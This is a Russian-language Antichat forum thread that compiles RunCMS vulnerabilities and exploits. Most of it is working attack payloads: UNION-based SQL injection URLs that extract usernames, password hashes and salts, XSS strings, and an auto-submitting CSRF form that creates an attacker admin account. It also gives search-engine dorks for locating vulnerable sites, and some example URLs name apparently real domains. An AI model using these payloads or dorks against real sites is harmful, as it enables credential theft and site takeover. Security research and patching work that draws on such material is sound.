Форум АНТИЧАТ - [ Обзор уязвимостей RunCMS ]

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)

- - [ Обзор уязвимостей RunCMS ] (https://forum.antichat.xyz/showthread.php?t=59283)

[ Обзор уязвимостей RunCMS ]

Обзор уязвимостей RunCMS

Сайт производителя: www.runcms.org
Актуальная версия: 1.6.1

Exploits

Цель: RunCMS <= 1.2
Воздействие: Выполнение произвольных команд
RunCMS <= 1.2 (class.forumposts.php) Arbitrary Remote Inclusion Exploit

Цель: RunCms 1.5.2 и более ранние версии
Воздействие: SQL-инъекция
RunCms <= 1.5.2 (debug_show.php) Remote SQL Injection Exploit

Цель: RunCMS <= 1.6
Воздействие: Выполнение произвольных команд
RunCMS <= 1.6 Local File Inclusion Vulnerability

Цель: RunCMS 1.6 и более ранние версии
Воздействие: Выполнение произвольных команд
RunCMS <= 1.6 disclaimer.php Remote File Overwrite Exploit

Цель: RunCMS 1.6
Воздействие: SQL-инъекция
RunCMS 1.6 Get Admin Cookie Remote Blind SQL Injection Exploit

Цель: RunCMS 1.6
Воздействие: SQL-инъекция
RunCMS 1.6 Remote Blind SQL Injection Exploit (IDS evasion)

Цель: RunCMS Newbb_plus 0.92 и более ранние версии
Воздействие: SQL-инъекция
RunCMS Newbb_plus <= 0.92 Client IP Remote SQL Injection Exploit

1. Multiple Blind SQL Injection

Attacker can inject SQL code in modules:

Код:

http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid+DSecRG_INJECTION

http://[server]/[installdir]/modules/mydownloads/visit.php?lid=2+DSecRG_INJECTION

http://[server]/[installdir]/modules/mydownloads/ratefile.php?lid=2+DSecRG_INJECTION

http://[server]/[installdir]/modules/mylinks/ratelink.php?lid=2+DSecRG_INJECTION

http://[server]/[installdir]/modules/mylinks/modlink.php?lid=2+DSecRG_INJECTION

http://[server]/[installdir]/modules/mylinks/brokenlink.php?lid=2+DSecRG_INJECTION

Example:

This query will return link to download file:

Код:

GET http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid=1+and+1=1 HTTP/1.0

This query will return error:

Код:

GET http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid=1+and+1=0 HTTP/1.0

2. Stored XSS

Vulnerability found in script modules/news/submit.php in post parameter name "subject"

Example:

Код:

POST http://[server]/[installdir]/modules/news/submit.php HTTP/1.0





subject=<script>alert("DSecRG_XSS")</script>

3. Linked XSS vulnerability found in modules/news/index.php, attacker can inject XSS in URL string:

Example:

Код:

http://[server]/[installdir]/modules/news/index.php/"><script>alert('DSecRG_XSS')</script>

3. This page can be overwritten by PHP injection:

Код:

runcms_1.6\modules\sections\cache\intro.php

runcms_1.6\modules\mylinks\cache\disclaimer.php

runcms_1.6\modules\mydownloads\cache\disclaimer.php

runcms_1.6\modules\newbb_plus\cache\disclaimer.php

runcms_1.6\modules\system\cache\disclaimer.php

runcms_1.6\modules\system\cache\footer.php

runcms_1.6\modules\system\cache\header.php

runcms_1.6\modules\system\cache\maintenance.php

V. 1.3a5 XSS

Код:

http://site.com/public/modules/downloads/ratefile.php?lid={number}">[XSS code]

RUNCMS 1.5.1 SQL Injection

Код:

http://site.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,  7,8,9,10+from+runcms_users+where+uid=2

//milw0rm.com

Нашел слепую скулю в runcms, начал проверять боян ли, оказалось что скуля была найдена до меня, но на ачате нет, поэтому выкладываю, уязвимость в параметре "bid" сценария "modules/banners/click.php"
Пример:
http://www.runcms.de/modules/banners/click.php?op=click&bid=3%20and%20substring(version (),1,1)=4

1) RunCMS MyAnnonces SQL Injection(cid)

Код:

# AUTHOR : S@BUN

#

# HOME 1 : http://www.milw0rm.com/author/1334

#

# MA─░L : hackturkiye.hackturkiye@gmail.com

#

################################################################

#

# DORK 1 : allinurl: "modules MyAnnonces index php pa view"

#

################################################################

EXAMPLE

XXXXMyAnnonces/index.php?pa=view&cid=[EXPLOiT]



EXPLOIT :



for admin = -9999999/**/union/**/select/**/0,uname/**/from/**/runcms_users/*



for pass = -9999999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*

2) RunCMS 1.6.1 Multiple XSS and XSRF

Код HTML:

###################################################################

RunCMS 1.6.1 Multiple XSS and XSRF Vulnerabilties           by NBBN

###################################################################



[b]

1) Create Webmaster (admin) XSRF Vulnerability[/b]

<html><head></head><body onLoad="javascript:document.attack.submit()">

<form action="http://localhost/xampp/runcms/modules/system/admin.php" 

method="post" enctype="multipart/form-data" name="r">

<input type="hidden" name="uname" value="Attacker">

<input type="hidden" name="name" value="Attacker">

<input type="hidden" name="email" value="attack@attack.com">

<input type="hidden" name="url" value="">

<input type="hidden" name="user_avatar" value="blank.gif">

<input type="hidden" name="theme" value="helloween">

<input type="hidden" name="timezone_offset" value="0">

<input type="hidden" name="language" value="deutsch">

<input type="hidden" name="user_icq" value="">

<input type="hidden" name="user_aim" value="">

<input type="hidden" name="user_msnm" value="">

<input type="hidden" name="user_from" value="">

<input type="hidden" name="user_occ" value="">

<input type="hidden" name="user_intrest" value="">

<input type="hidden" name="user_birth%5b2%5D" value="">

<input type="hidden" name="user_birth%5B1%5D" value="">

<input type="hidden" name="user_birth%5BO%5D" value="">

<input type="hidden" name="user_sig" value="">

<input type="hidden" name="umode" value="flat">

<input type="hidden" name="uorder" value="1">

<input type="hidden" name="bio" value="">

<input type="hidden" name="rank" value="7">

<input type="hidden" name="pass" value="Password">

<input type="hidden" name="pass2" value="Password">

<input type="hidden" name="fct" value="users">

<input type="hidden" name="op" value="addUser">

<input type="hidden" name="submit" value="%DCbernehmen">



Also with XSRF an attacker can update the profile of all users. He can change 

the password etc...



[b]2) Cross-Site Scripting (an attacker can only attack an admin)[/b]

<html><head></head><body onLoad="javascript:document.r.submit()">

<form action="http://localhost/xampp/runcms/modules/system/admin.php" 

method="post" enctype="multipart/form-data" name="r">

<input type="text" class="text" name="rank_title" size="30" maxlength="50" 

value="<marquee>Cross-Site Scritping :-("/>

<input type="hidden" name="fct" value="userrank">

<input type="hidden" name="op" value="RankForumAdd">

</form>

</body>

RUNCMS 1.6.1

Добавка комментария
-----------------------------
Неправильная обработка BB Code => Active XSS

Пример:

Код:

[*color]</textarea>[XSS][/*color]

Component Partner Sites 1.03 SQL Injection
(Admin priv)

Exploit:

Код:

modules/partners/admin/index.php?op=edit_partner&id=-1/**/union/**/select/**/1,2,3,4,5,concat(uname,0x3a,pass),7/**/from+runcms_users/**/limit/**/0,1

Component Web Links 1.02 SQL Injection
(Admin priv)

Exploit:

Код:

modules/mylinks/admin/index.php?op=modCat&cid=-1/**/union/**/select/**/1,concat(uname,0x3a,pass),3,4/**/from+runcms_users+limit+0,1

Hashing algorithm

PHP код:


		
			
$pass = sha1($username.$pass);

RunCMS Module section (artid) Remote SQL Injection Vulnerability

Код:

Cr@zy_King



crazy_kinq@hotmail.co.uk / hackshow.us



Grtz : Crackers_Child - str0ke - 3php - Alemin_Krali - Eno7 - DreamTurk - The_Bekir - Mhzr91



Runcms Module Section (artid) Remote Sql İnj. Vuln.



Example :



 - modules/sections/index.php?op=viewarticle&artid=Sql



 - Sql : 1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2



Cr@ Says : Kurtlar Vadisinde Memati Ölmeyecek kimse heyecanlanmasın :D



Alemin_Krali Says : Aynen katılıyorum (ne alaka ise a.q)



Good.



# milw0rm.com [2008-03-20]

RunCMS Module Photo 3.02 (cid) Remote SQL Injection Vulnerability

SQL Injection

Vulnerable: Module Photo 3.02

Exploit:

Код:

admin



modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,uname/**/from/**/runcms_users/*



pass



modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*

Dork:

Код:

allinurl: "modules/photo/viewcat.php?id"

inurl:photo "powered by runcms"

RunCMS Module nGuestBook 1.01 Active XSS

Add message => Message => [XSS]

dork: inurl:/modules/nguestbook/

SQL Injection

Vulnerable: Module Photo 4.00

Vuln code:

PHP код:


		
			
.....

include_once(PHOTO_PATH."/class/bama_cat.php");

$id = $HTTP_GET_VARS['id'];

if (isset($HTTP_GET_VARS['cid'])) {

.....

Exploit:

Код:

http://site.com/modules/photo/rateimg.php?id=-999999+union+select+pass+from+runcms_users+where+uid=1

ZAMUT (c)

RunCMS Module MyArticles 0.0.4-0.5 sql-inj

Sql-inj в параметре topic_id, GET фильтруется, поэтому данные нужно посылать POST-ом

Код:

http://mobilefree.ru/modules/myarticles/topics.php?op=listarticles&topic_id=-2 union select 1,2,concat_ws(0x3a,uname,pass),4,5,6 from runcms_users

RunCMS Module MyArticles 0.6 Beta-1 SQL Injection Vulnerability

SQL Injection

http://localhost/modules/myarticles/topics.php?op=listarticles&topic_id=[SQL]

Код:

-2 union select 1,2,concat_ws(0x3a,uname,pass),4,5,6 from runcms_users

milw0rm.com

RunCMS Module HotNews 2.00 (tid) Remote SQL Injection Vulnerability

Vuln code:

PHP код:


		
			
.....

include(XOOPS_ROOT_PATH."/header.php");

$tid = $HTTP_GET_VARS['tid'];

if ($HTTP_GET_VARS['page']) {

   $page = $HTTP_GET_VARS['page'];

.....

Exploit:

Код:

/modules/HotNews/index.php?op=printpage&tid=-9997+union+select+1,2,pass,4+from+runcms_users

Example:

Код:

http://www.segacfecgc.info/modules/HotNews/index.php?op=printpage&tid=-9997+union+select+1,2,pass,4+from+runcms_users

dork: /modules/HotNews/

ZAMUT(c)